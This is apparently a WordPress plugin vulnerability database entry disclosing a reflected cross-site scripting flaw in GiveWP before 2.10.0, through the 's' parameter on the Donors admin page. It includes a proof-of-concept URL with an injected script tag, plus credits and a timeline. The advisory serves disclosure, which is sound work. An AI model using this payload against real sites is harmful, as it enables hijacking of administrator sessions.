WordPress Plugin Vulnerabilities
GiveWP < 2.10.0 - Reflected Cross Site Scripting (XSS)
Description
The plugin was affected by a reflected Cross-Site Scripting vulnerability inside of the administration panel, via the 's' GET parameter on the Donors page.
Proof of Concept
https://example.com/wp-admin/edit.php?s=%22%3E<script>alert(0)</script>&start-date&end-date&form_id=0&action=-1&paged=1&give_action=delete_bulk_donor&orderby=id&order=DESC&action2=-1&post_type=give_forms&page=give-donors&view=donors
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Austin Bentley
Submitter
Austin Bentley
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-03-23 (about 3 years ago)
Added
2021-03-23 (about 3 years ago)
Last Updated
2021-03-24 (about 3 years ago)